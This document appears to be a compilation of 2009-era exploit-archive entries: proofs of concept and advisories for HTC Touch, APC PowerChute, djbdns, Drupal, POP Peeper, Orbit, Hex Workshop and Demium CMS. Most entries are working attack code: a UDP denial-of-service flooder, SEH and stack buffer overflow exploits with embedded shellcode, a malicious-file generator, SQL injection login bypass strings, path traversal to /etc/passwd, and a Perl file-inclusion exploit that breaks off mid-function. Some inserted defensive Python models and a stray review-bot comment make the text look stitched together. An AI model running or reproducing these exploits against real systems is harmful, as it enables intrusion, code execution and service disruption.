HTC Touch vCard over IP Denial of Service PoC

The code provides a means of demonstrating the HTC Touch vCard over IP DoS by sending vCards to port UDP/9204 of the target IP address.

The number of vCards (-c), the time interval between each vCard (-d), the length (-l) and, of course, the target address are configurable.

The content of each message can also be selected (-t) by providing the desired text, which will be embedded in each vCard sent.

Finally, a dedicated option (-s) can be used to demonstrate the effect of very large vCards. According to the advisory, these vCards are silently received without triggering any sound or ringtone, even if one has been properly selected in the UI settings.

#! /usr/bin/env python
#
# Copyright (c) 2009 Mobile Security Lab www.mseclab.com
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#

from socket import *
from sys import exit,argv
from time import *
import random
from optparse import OptionParser

# Global Variables
PORT = 9204
DEF_NUM_PACKETS = 10
DEF_VCARD_LEN = 1410
DEF_DELAY = 0.7
VCARD_HEADER = "BEGIN:VCARD\r\nVERSION:2.1\r\nN:"
VCARD_TRAILER = "\r\nEND:VCARD\r\n"

def main():
    # Local variables
    num_packets = DEF_NUM_PACKETS
    delay = DEF_DELAY

    print "\nMSL-2008-002 PoC for HTC Touch\nMobile Security Lab 2009\n"
    # Parsing options
    parser = OptionParser("usage: %prog [options] target_IP")
    parser.add_option("-s", "--silence", action="store_true", dest="silence", help="send silent vcards (32k)")
    parser.add_option("-c", "--count", type="int", help="specify number of vcards to send", dest="count")
    parser.add_option("-d", "--delay", type="float", help="specify delay between packets", dest="delay")
    parser.add_option("-l", "--len", type="int", help="specify vcard length", dest="len")
    parser.add_option("-t", "--text", type="string", help="specify vcard body text", dest="text")

    # Parse input
    (options, args) = parser.parse_args()
    if len(args) != 1:
        parser.print_help()
        print ""
        exit(1)

    if options.count:
        num_packets = options.count

    if options.delay:
        delay = options.delay

    # Build the vCard body once; every datagram carries the same payload
    if options.silence:
        vcard_body = VCARD_HEADER + 'A' * 32722 + VCARD_TRAILER
    elif options.len:
        vcard_body = VCARD_HEADER + 'A' * options.len + VCARD_TRAILER
    elif options.text:
        vcard_body = VCARD_HEADER + options.text + VCARD_TRAILER
    else:
        vcard_body = VCARD_HEADER + 'A' * DEF_VCARD_LEN + VCARD_TRAILER

    # Socket creation
    udp_sock = socket(AF_INET, SOCK_DGRAM)
    ADDR = (args[0], PORT)

    # Counters and timers
    counter = 1
    c_lap = 0
    total_data = 0
    print "Sending %d packets... to %s" % (num_packets, ADDR)
    start_time = time()
    start_lap = time()

    # Start sending packets
    while counter <= num_packets:
        len_sent = udp_sock.sendto(vcard_body, ADDR)
        if len_sent != len(vcard_body):
            print "Error sending packet n.%d" % counter
            break

        # Update counters
        counter += 1
        c_lap += 1
        total_data += len_sent

        # Sleep to let the device parse the vcards
        sleep(delay)

        # Report the number of packets sent in the last second
        local_lap = time()
        if local_lap - start_lap >= 1:
            print "%0.2f packets/sec" % (c_lap / (local_lap - start_lap))
            start_lap = local_lap
            c_lap = 0

    stop_time = time()
    stop_sec = stop_time - start_time

    # Display info
    print "Sent %d packets in %f seconds" % (num_packets, stop_sec)
    print "Start time: %s" % ctime(start_time)
    print "Stop time: %s" % ctime(stop_time)
    print "Payload Len = %d bytes" % len(vcard_body)
    print "Total Data sent = %d bytes (about %0.2f kB)" % (total_data, (float(total_data) / float(1024)))

# Global start
if __name__ == "__main__":
    main()

APC PowerChute Network Shutdown's Web Interface - XSS vulnerability

Application: APC PowerChute Network Shutdown's Web Interface
Vendor URL: http://www.apc.com/
Bug: XSS/Response Splitting
Exploits: YES
Reported: 20.10.2008
Vendor Response: 20.10.2008
Vendor Reference: 081020-000796
Solution: Use Firewall
Date of Public Advisory: 26.02.2009
Author: Digital Security Research Group [DSecRG] (research [at] dsec [dot] ru)



Description
***********

Linked XSS and Response Splitting vulnerabilities were found in APC PowerChute Network Shutdown's Web Interface.


Details
*******

1. Linked XSS vulnerability found in script /security/applet; vulnerable parameter: "referrer"


Example
*******

GET /security/applet?referrer=>"'>


2. Response Splitting vulnerability found in script contexthelp; vulnerable parameter: "page"


Example
*******

GET /contexthelp?page=Foobar?%0d%0aDSECRG_HEADER:testvalue HTTP/1.0

response:

HTTP/1.0 302 Moved temporarily
Content-Length: 0
Date: Чт, 25 сен 2008 10:47:42 GMT
Server: Acme.Serve/v1.7 of 13nov96
Connection: close
Expires: 0
Cache-Control: no-cache
Content-type: text/html
Location: help/english/Foobar?
DSECRG_HEADER:testvalue
Content-type: text/html
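The split response above, modelled in Python as an added example that is not part of the advisory: the decoded "page" value is concatenated into the Location header, a naive client then sees the injected DSECRG_HEADER as a real header, and a builder that rejects control characters closes the hole. The response template and the client-side parser are assumptions, not APC's code.

```python
from urllib.parse import unquote


def build_redirect_vulnerable(page):
    """Model of the contexthelp behaviour shown above: the decoded 'page'
    value is concatenated into the Location header unfiltered."""
    return ("HTTP/1.0 302 Moved temporarily\r\n"
            "Location: help/english/" + page + "\r\n"
            "Content-type: text/html\r\n\r\n")


def build_redirect_hardened(page):
    """Refuse any control character (CR, LF, NUL ...) in the redirect target,
    so the value can never terminate the Location line and start a new one."""
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in page):
        raise ValueError("control character in redirect target: %r" % (page,))
    return ("HTTP/1.0 302 Moved temporarily\r\n"
            "Location: help/english/" + page + "\r\n"
            "Content-type: text/html\r\n\r\n")


def parse_head(raw):
    """Read the response head the way a simple client or proxy would: the
    status line, then one header per CRLF-terminated line up to the blank line."""
    head = raw.split("\r\n\r\n", 1)[0]
    status, *lines = head.split("\r\n")
    headers = {}
    for line in lines:
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return status, headers


def headers_seen_by_client(raw_query_value):
    """Percent-decode the value as the server would, feed it to the vulnerable
    builder and return the header map a client ends up with."""
    return parse_head(build_redirect_vulnerable(unquote(raw_query_value)))[1]


# Constructed sample: the query value from the advisory's request line.
ADVISORY_PAGE = "Foobar?%0d%0aDSECRG_HEADER:testvalue"
```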



Solution
********

http://nam-en.apc.com/cgi-bin/nam_en.cfg/php/enduser/std_adp.php?p_faqid=9539


A low-risk web interface vulnerability has been discovered in the PowerChute Business Edition Shutdown Agent. This issue is scheduled to be addressed in a release of the application. While the severity of this vulnerability has been determined to be minimal, it is recommended that users continue to ensure the highest level of protection possible through the placement of PowerChute Business Edition behind a firewall.


References
**********

http://nam-en.apc.com/cgi-bin/nam_en.cfg/php/enduser/std_adp.php?p_faqid=9539


About
*****

Digital Security is a leading IT security company in Russia, providing information security consulting, audit and penetration testing services, risk analysis and ISMS-related services and certification for the ISO/IEC 27001:2005 and PCI DSS standards. Digital Security Research Group focuses on web application and database security problems, with vulnerability reports, advisories and whitepapers posted regularly on our website.


research [at] dsecrg [dot] com

Djbdns misformats some long response packets; patch and example attack

The DNS packet format allows names to be compressed by replacing the suffix of a name with an encoded offset to another location in the packet where the suffix already exists. Because of the encoding scheme, valid offsets are limited to < 16384.

In djbdns 1.05, response.c handles name compression. Line 12 has a comment "each <>= 16384 bytes into the packet, response_addname() incorrectly tries to encode an offset to that name and produces a misformatted response packet. (At the bottom of this email, there is a patch for this.)
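As an added illustration (not djbdns code) of the pointer encoding and of the patch's response_len < 16384 guard, the following Python models response_addname() on a constructed packet: 16 KB of filler stands in for earlier records, the compression table and the two names are assumptions, and the unpatched branch mirrors uint16_pack_big(buf, 49152 + name_ptr[i]) with no range check.

```python
import struct

POINTER_LIMIT = 1 << 14   # a compression pointer carries a 14-bit offset (RFC 1035, 4.1.4)
POINTER_TAG = 49152       # 0xC000: top two bits set mark the two bytes as a pointer


def pack_pointer_buggy(offset):
    """Mirror uint16_pack_big(buf, 49152 + offset): no range check, so the
    value silently wraps modulo 2**16 once offset reaches 16384."""
    return struct.pack(">H", (POINTER_TAG + offset) & 0xFFFF)


def pack_pointer_checked(offset):
    """Same encoding, but refuse offsets the 14-bit field cannot hold."""
    if not 0 <= offset < POINTER_LIMIT:
        raise ValueError("offset %d does not fit a compression pointer" % offset)
    return struct.pack(">H", POINTER_TAG | offset)


def classify(two_bytes):
    """What a resolver makes of these bytes: a pointer, or a plain label length."""
    b0, b1 = two_bytes[0], two_bytes[1]
    if b0 & 0xC0 == 0xC0:
        return ("pointer", ((b0 & 0x3F) << 8) | b1)
    if b0 & 0xC0 == 0x00:
        return ("label", b0)   # a label of b0 bytes follows; 0 ends the name
    return ("reserved", b0)


def wire_labels(labels):
    """Length-prefixed labels, no terminator."""
    return b"".join(bytes([len(lab)]) + lab.encode() for lab in labels)


def add_name(packet, labels, table, patched):
    """Toy model of response_addname(): if some suffix of the name was seen
    before, emit the leading labels plus a pointer to it; otherwise remember
    each suffix's offset (subject to the patch's response_len < 16384 test)
    and append the name uncompressed. The real code also requires dlen <= 128."""
    for i in range(len(labels)):
        suffix = tuple(labels[i:])
        if suffix in table:
            return packet + wire_labels(labels[:i]) + pack_pointer_buggy(table[suffix])
        offset = len(packet) + len(wire_labels(labels[:i]))
        if not patched or offset < POINTER_LIMIT:
            table[suffix] = offset
    return packet + wire_labels(labels) + b"\x00"


def tail_after_16k(patched):
    """Constructed packet: 16 KB of filler (earlier records), then the name
    x.burlap.dempsky.org, then foo.x.burlap.dempsky.org. Returns the bytes
    emitted for the second name."""
    table = {}
    packet = b"\x00" * POINTER_LIMIT
    packet = add_name(packet, ["x", "burlap", "dempsky", "org"], table, patched)
    before = len(packet)
    packet = add_name(packet, ["foo", "x", "burlap", "dempsky", "org"], table, patched)
    return packet[before:]
```

Unpatched, the pointer to offset 16384 wraps to the two bytes 00 00, which a resolver reads as the root label, so the name ends after "foo"; patched, the name is written out in full.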

You can reproduce an exploit of this bug as follows:

# Download and build ucspi-tcp-0.88.
$ curl -O http://cr.yp.to/ucspi-tcp/ucspi-tcp-0.88.tar.gz
$ tar -zxf ucspi-tcp-0.88.tar.gz
$ echo 'gcc -include /usr/include/errno.h -O' > ucspi-tcp-0.88/conf-cc
$ make -C ucspi-tcp-0.88

# Download and build djbdns-1.05.
$ curl -O http://cr.yp.to/djbdns/djbdns-1.05.tar.gz
$ tar -zxf djbdns-1.05.tar.gz
$ echo 'gcc -include /usr/include/errno.h -O' > djbdns-1.05/conf-cc
$ make -C djbdns-1.05

# Use tcpclient and axfr-get to do a zone transfer for
# burlap.dempsky.org from shinobi.dempsky.org.
$ ./ucspi-tcp-0.88/tcpclient shinobi.dempsky.org 53 \
./djbdns-1.05/axfr-get burlap.dempsky.org data data.tmp

# Use tinydns-data to compile data into data.cdb.
$ ./djbdns-1.05/tinydns-data

# Simulate an A query for www.x.burlap.dempsky.org using the data
# from the zone transfer.
$ ./djbdns-1.05/tinydns-get a www.x.burlap.dempsky.org

The last command will include these two lines in the output:

additional: foo 8388608 NS a.ns.bar
additional: foo 8388608 NS b.ns.bar

i.e., poisonous NS records for foo, delegating the domain to a.ns.bar and b.ns.bar; with my patch applied, only records within burlap.dempsky.org are output. Also, there's significant freedom in what poisonous records the attacker can produce.

The security hole here is that an administrator who uses djbdns 1.05 to serve DNS content does not expect that configuring his name server as above will cause it to send records for names outside of burlap.dempsky.org. I.e., an attacker can trick the administrator's name servers into including arbitrary DNS records in responses to queries for names within domains he controls. Note that axfr-get is doing the right thing here: it already strips out names from outside of the specified zone; it's just that tinydns-get (and so tinydns and axfrdns) misformat the response packet. A direct NS query for foo would not generate these poisonous records.

As a real life example, I registered burlap.dempsky.org as a secondary domain with EveryDNS pulling data from my server. I was able to trick their name servers into serving the above poisonous NS records. EveryDNS's name servers have no authority over the hypothetical foo TLD, but I could have included poisonous NS records for everydns.net instead. The DNS cache from djbdns 1.05, dnscache, would have rejected these records as poison, but it's possible other DNS caches might accept them. (Either way, EveryDNS installed my patch earlier today, so this is no longer a risk.)

As another example, I registered burlap.afraid.org as a secondary domain with FreeDNS (freedns.afraid.org). They don't use djbdns, but if they had, this would have allowed me to include poisonous NS records for afraid.org that DNS caches like dnscache and BIND would have accepted.

Some caveats: this bug only affects domains that serve DNS content using tinydns and axfrdns (only for DNS queries over TCP; clients do not need AXFR permissions) from djbdns 1.05 and allow untrusted users to include arbitrary records (at least about 100 records, totalling about 30KB of space) within some zone.

In summary: if you use tinydns/axfrdns from djbdns 1.05 to serve authoritative DNS content and give untrusted users control over records you serve, I strongly suggest you install this patch. I don't believe other users are at risk, but they are encouraged to install this patch as well to be safe.

Finally, here's the promised patch:

--- response.c.orig 2009-02-24 21:04:06.000000000 -0800
+++ response.c 2009-02-24 21:04:25.000000000 -0800
@@ -34,7 +34,7 @@
uint16_pack_big(buf,49152 + name_ptr[i]);
return response_addbytes(buf,2);
}
- if (dlen <= 128)
+ if ((dlen <= 128) && (response_len < 16384))
if (name_num < NAMES) {
byte_copy(name[name_num],dlen,d);
name_ptr[name_num] = response_len;
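Review bot: The guard `if ((dlen <= 128) && (response_len < 16384))` is the right place to stop the bug, since the emit path above, `uint16_pack_big(buf,49152 + name_ptr[i]);`, only yields a valid pointer while every recorded `name_ptr` fits in 14 bits; the bare literal 16384 should carry a comment or a named constant saying exactly that, so the coupling between the two sites stays visible to the next reader. Names past the limit are now simply written uncompressed, which costs bytes but never produces a malformed pointer.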

#matthewatdempsky(dot)org

Drupal Local File Inclusion Vulnerability (Windows)

Vulnerable code:
function theme_render_template($template_file, $variables) {
  extract($variables, EXTR_SKIP);  // Extract the variables to a local namespace
  ob_start();                      // Start output buffering
  include "./$template_file";      // Include the template file <<< here is the vulnerability
  $contents = ob_get_contents();   // Get the contents of the buffer
  ob_end_clean();                  // End buffering and discard
  return $contents;                // Return the contents
}

Basically, by manipulating the q variable, it's possible to partially control the include path. The GET variable q was set to "start/../../xxx\..\..\end" and it was only partially sanitized: it reached the include function as "./themes/garland/page-start-..-..-xxx\..\..\end.tpl.php". All the forward slashes were replaced with "-", while the backslashes survived.

Moreover, we cannot fully control the include path: the user input is automatically prefixed with "./themes/garland/page-".

So, this vulnerability doesn't look exploitable, right? Actually, this is exploitable, but only on Windows systems.

On Unix systems, something like "cat /var/www/some_invalid_filename/../../../../../etc/passwd" doesn't work because some_invalid_filename is not a directory. It will not work even if you have a valid filename in there. In my opinion this is the expected behavior.

However, on Windows things are different.

Executing the command "type c:\windows\sssssssssssss\..\..\..\..\..\boot.ini" will return the contents of c:\boot.ini even if sssssssssssss is not a directory and does not even exist as a filename.

PHP option magic_quotes_gpc is turned OFF in Drupal, so it's possible to use to terminate the string. Therefore, if you set q to something like q=\..\..\..\..\..\..\..\..\..\..\..\..\boot.ini it's possible to include the contents of boot.ini on Windows systems (if the web server is installed on the C: partition).
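The Windows-only traversal described above, as an added example that is not part of the advisory or of Drupal: ntpath.normpath collapses ".." lexically, exactly like the Windows path parser, so the partially sanitized q value still escapes the theme directory; a containment check catches it, and an allow-listed suggestion name avoids the problem entirely. The theme directory, the sanitizer model and the allow-list are assumptions.

```python
import ntpath
import re

THEME_DIR = "./themes/garland"
SAFE_SUGGESTION = re.compile(r"^[A-Za-z0-9_-]{1,64}\Z")


def drupal_style_path(q):
    """Model of the path construction the advisory describes: forward slashes
    in q are rewritten to '-', the result is wrapped in a fixed prefix and
    suffix. Backslashes and '..' survive untouched."""
    return THEME_DIR + "/page-" + q.replace("/", "-") + ".tpl.php"


def windows_resolves_to(path):
    """ntpath.normpath collapses '..' purely lexically, which is also how the
    Windows path parser treats it: a component that does not exist on disk is
    still consumed by the '..' that follows it."""
    return ntpath.normpath(path)


def escapes_theme_dir(path):
    """Containment check: after lexical normalisation the path must still sit
    inside the theme directory."""
    base = ntpath.normpath(THEME_DIR)
    resolved = windows_resolves_to(path)
    return not (resolved == base or resolved.startswith(base + "\\"))


def safe_template_path(q):
    """Hardened variant: allow-list the suggestion so no separator, dot or
    control character reaches the path. (A NUL would end the string in a
    C-backed file API and discard the appended .tpl.php suffix.)"""
    if not SAFE_SUGGESTION.match(q):
        raise ValueError("rejected template suggestion: %r" % (q,))
    path = THEME_DIR + "/page-" + q + ".tpl.php"
    if escapes_theme_dir(path):   # cannot happen after the allow-list; defence in depth
        raise ValueError("template path escapes the theme directory")
    return path


# Constructed inputs taken from the advisory's own description.
ADVISORY_Q = "start/../../xxx\\..\\..\\end"
ADVISORY_BOOT_INI = "c:\\windows\\sssssssssssss\\..\\..\\..\\..\\..\\boot.ini"
```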

A bit more information is available in our blog at http://www.acunetix.com/blog/websecuritynews/drupal-local-file-inclusion-vulnerability/.

Drupal security team was notified about this vulnerability on 29 January 2009 and they've released a fix on 25 February 2009.

The fix for Drupal versions 5.x is available at http://drupal.org/node/384024.
And for Drupal versions 6.x can be found at http://drupal.org/node/383724.

POP Peeper 3.4.0.0 UIDL Remote Buffer Overflow Exploit (SEH)

#!/usr/bin/perl
# KL0209EXP-poppeeper_uidl-bof.pl
# 02.27.2009
# Krakow Labs Development [www.krakowlabs.com]
# POP Peeper 3.4.0.0 UIDL Remote Buffer Overflow Exploit
#
# SEH overwrite exploitation, uses Imap.dll (included with POP Peeper) for universal
# exploitation (gotta love no /SafeSEH). Special thanks goes to James Burton for help
# and collaboration for exploitation of this bug :P. Tested on Windows XP SP3.
#
# rush@KL (Jeremy Brown) [rush@krakowlabs.com]
# Jayji (James Burton) [jayjiftw@gmail.com]
#
# Associated Files & Information:
# http://www.krakowlabs.com/res/adv/KL0209ADV-poppeeper_uidl-bof.txt
# http://www.krakowlabs.com/dev/exp/KL0209EXP-poppeeper_uidl-bof.pl.txt
# http://www.krakowlabs.com/dev/exp/KL0209EXP-poppeeper_uidl-bof.jpg
#
# KL0209EXP-poppeeper_uidl-bof.pl

use IO::Socket;

$nextsehh = 0x909006EB; # JMP 6
$sehh = 0x10014E39; # Windows XP UNIVERSAL Imap.dll pop pop ret

# Win32 Bindshell Shellcode (author=metasploit,port=55555,encoder=pexalphanum,size=709,exitfunc=thread)
$sc = "";   # [shellcode blob omitted]

$serv = IO::Socket::INET->new(Proto=>'tcp',
LocalPort=>'110',
Listen=>1,
Timeout=>60)
or die "Error: listen(110)\n";

$cli = $serv->accept() or die "Error: accept()\n";

$nextseh = pack('l', $nextsehh);
$seh = pack('l', $sehh);
$nop = "\x90";

$payload = "+OK\r\n1 " . "A" x 1072 . $nextseh . $seh . $nop x 32 . $sc . "\r\n.\r\n";

$cli->send("+OK\r\n");
$cli->recv($recvbuf, 512);
$cli->send("+OK\r\n");
$cli->recv($recvbuf, 512);
$cli->send("+OK\r\n");
$cli->recv($recvbuf, 512);
$cli->send("+OK 1 100\r\n");
$cli->recv($recvbuf, 512);
$cli->send($payload);

close($cli);
close($serv);

# milw0rm

Orbit <= 2.4 Long Hostname Remote Buffer Overflow Exploit

<html>
<body>

Orbit <=2.4 Long Hostname Buffer Overflow Vulnerability Poc

Vulnerability
discovered by Secunia

Exploit and POC provided by: JavaGuru



Right click on the link below, then choose download by Orbit; CALC.EXE will pop up.

I got a lot of problems when trying to execute shellcode, because a lot of chars were forbidden and I was not able to execute shellcode. After playing a little I found out the solution. Don't forget, open this HTML in Firefox.

Check it out.

Any questions/comments: JavaGuru1999@yahoo.de

<script language="JavaScript">
var tmp = "http://";

for (i=0;i<508;i++) tmp +="%6F";

// jmp esp from kernel32.dll XP SP 3 English
//
tmp += "%7B%46%86%7C";

// some nops
tmp += "%90%90%90%90";

// win32_exec - EXITFUNC=process CMD=calc.exe Size=424 Encoder=Alpha2 http://metasploit.com
// forbidden chars - 0x00 0x01 0x02 0x03
tmp += "%eb%59%59%59%59%eb%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%59%e8%a4%ff%ff%ff%37%49%49%49%49%49%49%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%67%58%50%30%42%31%41%42%6b%42%41%77%32%42%42%32%41%41%30%41%41%58%42%50%38%42%42%75%6d%39%49%6c%4b%58%37%34%43%30%33%30%77%70%6e%6b%73%75%55%6c%6e%6b%61%6c%66%65%50%78%54%41%4a%4f%6c%4b%62%6f%56%78%4c%4b%51%4f%45%70%55%51%7a%4b%31%59%6e%6b%36%54%4c%4b%53%31%6a%4e%45%61%4f%30%5a%39%4c%6c%6e%64%49%50%34%34%55%57%6a%61%4b%7a%66%6d%35%51%6b%72%6a%4b%6c%34%55%6b%41%44%44%64%76%64%73%45%5a%45%4c%4b%73%6f%57%54%47%71%6a%4b%30%66%6c%4b%74%4c%30%4b%6c%4b%53%6f%37%6c%47%71%5a%4b%6e%6b%77%6c%6c%4b%34%41%4a%4b%4b%39%51%4c%44%64%54%44%7a%63%37%41%4f%30%41%74%6c%4b%43%70%76%50%4c%45%4f%30%30%78%66%6c%6c%4b%37%30%64%4c%6c%4b%30%70%65%4c%6c%6d%4c%4b%43%58%36%68%78%6b%75%59%6e%6b%6f%70%4e%50%55%50%55%50%55%50%4e%6b%75%38%55%6c%43%6f%46%51%79%66%63%50%70%56%4c%49%6c%38%6b%33%6f%30%61%6b%32%70%71%78%61%6e%6b%68%7a%42%43%43%71%78%5a%38%6b%4e%6d%5a%76%6e%70%57%69%6f%6d%37%72%43%55%31%30%6c%70%63%76%4e%70%65%72%58%50%65%73%30%67";

// Filename (not important)
tmp += "/a.rar";

// Write link for download for orbit!
document.write('<a href="' + tmp + '">Right click, then choose download with orbit</a>');


</script>
</body>
</html>

# milw0rm

Hex Workshop v6 (.HEX File) Local Code Execution Exploit

#!/usr/bin/perl -w
# Hex Workshop <= v6 (.hex) File Local Code Execution
# Discovered by : Security^Ghost
# Exploited by : DATA_SNIPER
# Exploit tested on WindoZ XP SP2 FR.
# for more information visit my blog: http://datasniper.arab4services.net/
# the exploit is so weird ;), take a look at the shellcode, and remember it's not AlphaNum.

print "==========================================================================\n";
print "Hex Workshop v6 (.HEX File) Local Code Execution\n";
print "Exploited by DATA_SNIPER\n";
print "Greetz to: arab4services team and AT4RE Team\n";
print "for more: http://datasniper.arab4services.net/\n";
print "===================================================================== \n";
$junk=":0000FC\x0D\x0A:";
$shelladd="B8EE1300D0EE1300C8EE1300AAAAAAAAC8EE1300C8EE1300"; # shell address in the stack and some junk addresses to make the exploit work
# sometimes the stack address changes to "0012xxxx", so you can use this instead
# $shelladdrr="B8EE1200D0EE1200C8EE1200AAAAAAAAC8EE1200C8EE1200"
$nop="909090909090909090909090909090"; # strange nop sled xD
# shellcode from metasploit, executes calc.exe
# shellcode copied as is; when the data is processed it will be converted to HEX format.
$shellcode="33c9b11ebbf01a028cdaccd97424f45a83c204315a0b035afbf8f77013b8f788e3cabdb468b038bd6fa6c87277b390ac86286726bc2579d68df9e38a693967d4b07085dbf06e62e0a0548f62ad1ed0a82cca893b2247dd6326560a104ad3cdccfbbfe9163860c3e0dec9478658c60cd868ad63c5dd3aebfd94c56f3dcc6518c0c864ab547096c6abd79830d0b60adc17";
$buff='A' x 248;
$sploit =$junk.$buff.$shelladd.$nop.$shellcode;
$fle = "Xploit.hex" ;
open($data, ">$fle") or die "Cannot open $fle: $!";   # write (not append) so a rerun does not duplicate the file body
print $data $sploit;
close($data);
print "$fle has been created\n";
print "open it in HexWorkshop file->import.\n";

# milw0rm

Demium CMS 0.2.1B Multiple Vulnerabilities and Exploit

Demium CMS, version 0.2.1 Beta, is prone to multiple remote vulnerabilities because user input is not properly validated. Let's see them. In this advisory you can find the vulnerabilities, the affected source, and several remote exploits.


Credits to : Giovanni Buzzin, Osirys
Contact : osirys[at]autistici[dot]org
Website : http://osirys.org
Download : http://www.demium.de/ftp/archive/demium_beta_v.0.2.1.rar


[0x01 - Authority Bypass via Sql Injection]

First, it is vulnerable to Authority Bypass via SQL Injection. It needs magic quotes OFF to work, because the CMS does not escape POST data itself.

Vulnerable file is: /[path]/index_admin.php
[CODE]
$username = $_POST['user'];
$pw = md5($_POST['pw']);
$sql = "SELECT * FROM cms_profile WHERE profile_username = '$username' AND profile_password = '$pw' AND profile_aktiv=1;";
$result = mysql_query($sql);
$failure=true;
while($row = mysql_fetch_assoc($result))
{
$failure=false;
setcookie("login_pw", $pw, (time()+(60*60*24*365)));
setcookie("login_user", $username, (time()+(60*60*24*365)));
header("Location: /demium_beta_v.0.2.1//index_admin.php?loading=1");
}
}
[/CODE]

To exploit this vulnerability, and become Administrator, just put this in username form: admin_user' or '1=1
Where admin_user is the real nickname of the Administrator, by default: admin.

[/0x01]
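The index_admin.php query above rebuilt in Python against an in-memory SQLite table, as an added example that is not part of the advisory or of Demium: the string-built query (as in the CMS) beside a parameterised one, showing why the username admin' or '1=1 logs in without the password. The sample account and the md5 helper are constructed; magic quotes would only have blunted this by escaping the quote.

```python
import hashlib
import sqlite3


def md5_hex(text):
    """PHP md5() equivalent, as used for profile_password in the CMS."""
    return hashlib.md5(text.encode()).hexdigest()


def make_db():
    """Constructed sample data: a single active admin account."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE cms_profile (profile_username TEXT, "
               "profile_password TEXT, profile_aktiv INTEGER)")
    db.execute("INSERT INTO cms_profile VALUES (?, ?, 1)", ("admin", md5_hex("s3cret")))
    return db


def vulnerable_sql(username, pw):
    """The query as index_admin.php builds it: raw POST data dropped inside quotes.
    With the bypass username the WHERE clause becomes
    profile_username = 'admin' or '1=1' AND profile_password = '...' AND profile_aktiv=1
    and AND binds tighter than OR, so the left disjunct alone selects the admin row."""
    return ("SELECT profile_username FROM cms_profile WHERE profile_username = '%s' "
            "AND profile_password = '%s' AND profile_aktiv=1" % (username, pw))


def login_vulnerable(db, username, password):
    row = db.execute(vulnerable_sql(username, md5_hex(password))).fetchone()
    return row[0] if row else None


def login_hardened(db, username, password):
    """Bound parameters: the quote in the username is data, never SQL syntax."""
    sql = ("SELECT profile_username FROM cms_profile WHERE profile_username = ? "
           "AND profile_password = ? AND profile_aktiv=1")
    row = db.execute(sql, (username, md5_hex(password))).fetchone()
    return row[0] if row else None


# Constructed: the username from the advisory, using the default admin name.
BYPASS_USERNAME = "admin' or '1=1"
```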

[0x02 - Remote SQL Injection]

Multiple SQL Injection vulnerabilities were found in this CMS; I report only the first one I found. Magic quotes need to be OFF because the CMS does not escape incoming GET data itself.

Vulnerable file is: /[path]/tracking.php
[CODE]



' into outfile '/tmp/sh_spawn_ownz.txt

Exploit #1 will produce a GET request to a non-existing file, since after the exploit the remote user is redirected to host/sql_output/.html.
Testing this SQL Injection locally I got redirected to this URL: http://localhost/admin:5f4dcc3b5aa765d61d8327deb882cf99/.html , producing the classic:
The requested URL /admin:5f4dcc3b5aa765d61d8327deb882cf99/.html was not found on this server.

Exploit #2 just creates a file called "sh_spawn_ownz.txt" with "" as content, yes, a remote shell. With the LFI vulnerability the remote user will be able to include the created file and execute commands.

Exploit provided at the end of the advisory.


[/0x02]

[0x03 - Remote File Disclosure]

It is also vulnerable to File Disclosure: with a GET request a remote user is able to read file contents. It is not a file inclusion but an fread() of a local file. Let's see the vulnerable code.

Vulnerable file is: /[path]/urheber.php
[CODE]
", $contents);
echo $contents;
}
// Other code
[/CODE]

$fname comes directly from GET, without being checked first. Its value is set from the GET request and, by appending a NULL byte, a remote user is able to read the content of the selected file.
Attack example: /[path]/urheber.php?name=../content.php
This request will show the /[path]/content.php source code.
Attack example #2 : /[path]/urheber.php?name=../../../../../../../../../../etc/passwd

[/0x03]

[0x04 - Local File Inclusion]

This CMS is also affected by Local File Inclusion: a remote user is able to include and execute a local file on the server. I then coded a simple exploit that obtains Remote Command Execution by creating a malicious file on the server and including it through the LFI.

Vulnerable file is: /[path]/content.php
[CODE]

[/CODE]

If the remote user's user and password cookies are set, the script includes the file named by the GET data; a simple Perl exploit is at the end of the advisory.

[/0x04]



#########
Exploits section now.
####


[$$ - Local File Inclusion Exploit]

#!/usr/bin/perl

# LFI Sploit
# by Osirys

use IO::Socket;

my $host = $ARGV[0];

($host) || help("-1");
cheek($host) == 1 || help("-2");
&banner;

$datas = get_input($host);
$datas =~ /(.*) (.*)/;
($h0st,$path) = ($1,$2);

&exploit;

sub exploit () {
print "\n[*] Include: ";
chomp($l_file = );

print "\n";
$l_file !~ /exit/ || die "Exiting ..";
if ($l_file !~ /^/) {
$l_file = $l_file."";
}

my $url = $path."/content.php?include=".$l_file;

my $data = "GET ".$url." HTTP/1.1\r\n".
"Host: ".$h0st."\r\n".
"Keep-Alive: 300\r\n".
"Connection: keep-alive\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Cookie: login_user=p0wnin; login_pw=p0wnin\r\n".
"Content-Length: 0\r\n\r\n".
"\r\n";

my $socket = new IO::Socket::INET(
PeerAddr => $h0st,
PeerPort => '80',
Proto => 'tcp',
) or die "[-] Can't connect to $h0st:80\n[?] $! \n\n";

$socket->send($data);

my $count = 0;
while (my $e = <$socket>) {
$count++;
if ($count > 9) {
chomp($e);
print "$e\n";
}
}

&exploit;
}

sub cheek() {
my $host = $_[0];
